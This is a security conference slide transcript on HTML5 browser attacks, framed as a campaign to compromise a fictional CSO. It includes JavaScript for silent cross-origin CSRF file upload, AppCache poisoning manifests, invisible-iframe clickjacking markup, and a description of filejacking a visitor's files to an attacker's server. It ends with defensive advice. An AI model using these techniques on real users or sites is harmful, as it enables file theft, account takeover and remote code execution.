Html5: Something wicked this way comes (Hack in Paris)

H TML5 Krzysztof Kotowicz, SecuRing kkotowicz@securing.pl @kkotowicz

Meet Bob 2

Meet Bob #1 Bob is a CSO of largebiz.com #1b Bob has interesting stuff #2 I don’t like Bob #3 I want to pwn Bob 3

Bob’s pwnage stage #1• Bob has a hobby - e.g. hacking• He has cool ﬁle://s• I want to get them!• He’s not THAT stupid to run EXE, SCR etc.• Use ﬁlejacking! 4

Filejacking• HTML5 directory upload (Chrome only) <input type=file directory>• displays this ====>• JS gets read access to all ﬁles within chosen folder 5

Filejacking Business plan• set up tempting webpage• overlay input (CSS) with• wait for Bob• get ﬁles & upload them to your server 6

Filejacking 7

Filejacking 8

Filejacking• I’ve tried this IRL• How clueless users actually are? • http://kotowicz.net/wu running for ~13 mo • very limited exposure • only websec oriented visitors• 298 clients connected (217 IPs)• tons of interesting ﬁles 9

Filejacking LOTS of these ------>• Downloads/# BeNaughtyLive.com/• Downloads/# GoLiveTrannies.com/• BratSluts 11 12 04 Sasha Cane Red Tartan SchoolGirl XXX 720p WMV SEXORS.nzb• bitches/1300563524557.jpg• Flowchart-Fap-To-It.jpg 10

Filejacking• websec staff!• but surely no private data? 11

Filejacking• Wireless Assess points.txt• interesting network next to me.txt• onlinePasswords.txt• s/pw.txt• letter of authorization.pdf• Staff-<name,surname>.pdf• <name,surname> - resume.doc• Pricing-Recommendation_CR.xlsm.zip• but surely no clients data? 12

Filejacking• sony reports/ • Faktura_numer_26_2011_ 0045_sonymusic.##.zip <company>.pdf• SecurityQA.SQL.Injection. • websec cred~ Results.v1.1.docx • security_users.sql.zip• SSOCrawlTest5.4.097.xml • !important - questions for• IPS CDE Wireless Audit- web developers.docx January 2011-1 0.docx • sslstrip.log~• IPS Wireless Testing • ##### Paros Log.txt Schedule April 2011.xls• 01-####### Corporation (Security Unarmed So much for NDAs... Guard).xls 13

Filejacking+ All your ﬁle are belong to me+ Trivial to set up+ Filter ﬁles by e.g. extension, size etc.- Chrome only- Requires users prone to social- engineering 14

Bob’s pwnage stage #2• Bob travels a lot & loves Facebook• I want to control Bob’s FB account • even when he changes the password in a month• I want to ﬁngerprint Bob’s intranet• Use rogue access point & AppCache poisoning! 15

AppCache poisoning HTML5 Ofﬂine Web Applications <html manifest=cache.manifest>• cache.manifest lists URLs to cache• cache expires only when CACHE MANIFEST index.html manifest is changed stylesheet.css images/logo.png scripts/main.js 16

AppCache poisoning Poison Wait Proﬁt AppCache for Bob 17

AppCache poisoning• DEMO• Quirks used: • manifest must be MIME text/cache-manifest • Chrome ﬁlls AppCache without user conﬁrmation 18

AppCache poisoning• tamper http://victim/ <html manifest=/robots.txt> <script>evil()</script>• tamper http://victim/robots.txt CACHE MANIFEST CACHE: http://victim/ NETWORK: * 19

AppCache poisoning Later on, after m-i-t-m:1. http://victim/ fetched from AppCache2. browser checks for new manifest GET /robots.txt3. receives text/plain robots.txt & ignores it4. tainted AppCache is still used 20

AppCache poisoning+ Poison any URL+ Payload stays until manually removed- Chrome or Firefox with user interaction- Needs active man-in-the-middle to inject https://github.com/koto/sslstrip 21

Bob’s pwnage stage #3• Bob loves sharing photos (Flickr?)• I want to replace Bob as CSO• What if Bob uploaded some discrediting ﬁles?• Try silent ﬁle upload 22

Silent file upload• File upload purely in Javascript• Emulates <input type=file> with: • any file name • any file content• File constructed in Javascript (it’s not a real file!)• Uses Cross Origin Resource Sharing 23

Silent file upload• Cross Origin Resource Sharing = cross domain AJAXhttp://attacker.com/var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim", true);xhr.setRequestHeader("Content-Type", "text/plain");xhr.withCredentials = "true"; // send cookiesxhr.send("Anything I want"); 24

Silent file upload• raw multipart/form-data requestfunction fileUpload(url, fileData, fileName) { var boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.withCredentials = "true"; xhr.setRequestHeader("Content-Type", "multipart/form-data,boundary="+boundary); 25

Silent file uploadvar b = "--" + boundary + rnContent-Disposition: form-data; name="contents"; filename=" + fileName + "rnContent-Type: application/octet-streamrnrn + fileData + rn-- + boundary + --;xhr.setRequestHeader("Content-Length", b.length);xhr.send(b); 26

Silent file upload+ No user interaction+ Works in most browsers+ You can add more form ﬁelds- CSRF ﬂaw needed- No access to response 27

Silent file upload DEMO Flickr.com 28

Silent file upload• GlassFish Enterprise Server 3.1. • CVE 2012-0550 by Roberto Suggi Liverani• //goo.gl/cOu1F logUrl = http://glassfishserver/ management/domain/applications/ application; fileUpload(c,"maliciousarchive.war");• logged admin + CSRF = RCE 29

Same origin policy• makes web (relatively) safe • restricts cross-origin communication• can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing• or ignored... • UI redressing 30

UI Redressing? Jedi mind tricks on victim users 31

UI Redressing • This is not the page you’re looking at • This is not the thing you’re clicking • .................................................. dragging • .................................................. typing • .................................................. copying • Victims attack the applications for us 32

Clickjacking? 33

Bob’s pwnage stage #4• Bob likes online games• I found a vulnerable website used by Bob• Bob would have to type the payload himself :-(• Make Bob play a game! 34

Drag into• Put attackers content into victim form Demo 35

Drag into+ Inject arbitrary content+ Trigger self-XSS- Firefox only (will die soon!)- X-Frame-Options 36

Bob’s pwnage stage #5• Bob has access to internal HR application• I want to know his salary• Make Bob play a game (again)! 37

Drag out content extraction image image 38

Drag out content extraction image victim <iframe> image 39

Drag out content extraction image victim <iframe> textarea <textarea> 40

Drag out content extraction<div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea></div> 41

Drag out content extraction 42

Drag out content extraction 43

Drag out content extraction Demo . 44

Drag out content extraction+ Access sensitive content cross domain- Firefox only (will die soon!)- X-Frame-Options 45

Summary• HTML5 is attacker’s friend too!• Don’t get framed• Users based pwnage FTW Developers: Use X-Frame-Options: DENY 46

Wake up, I’m done!• html5sec.org• code.google.com/p/html5security• www.contextis.co.uk/research/white-papers/clickjacking• blog.kotowicz.net• github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl Thanks @0x6D6172696F, @garethheyes, @theKos, @7a_, @lavakumark, @malerisch, @skeptic_fx, .... 47

http://blog.kotowicz.net	7739
http://www.cyber-securite.fr	235
http://feeds.feedburner.com	62
http://3650259870998252242_65eaec282458adbaa2dfb1f6cac4b6dbe3bda7cf.blogspot.com	19
http://webcache.googleusercontent.com	18
http://translate.googleusercontent.com	17
http://www.mybestcv.co.il	11
https://twitter.com	6
http://flavors.me	4
http://us-w1.rockmelt.com	3
https://si0.twimg.com	2
http://abtasty.com	1
http://quidecco.com	1
https://twimg0-a.akamaihd.net	1
http://www.google.com&_=1362576032897 HTTP	1

Html5: Something wicked this way comes (Hack in Paris)

by Krzysztof Kotowicz on Jun 29, 2012

Accessibility

Categories

Upload Details

Usage Rights

15 Embeds 8,120

Statistics

Html5: Something wicked this way comes (Hack in Paris) Presentation Transcript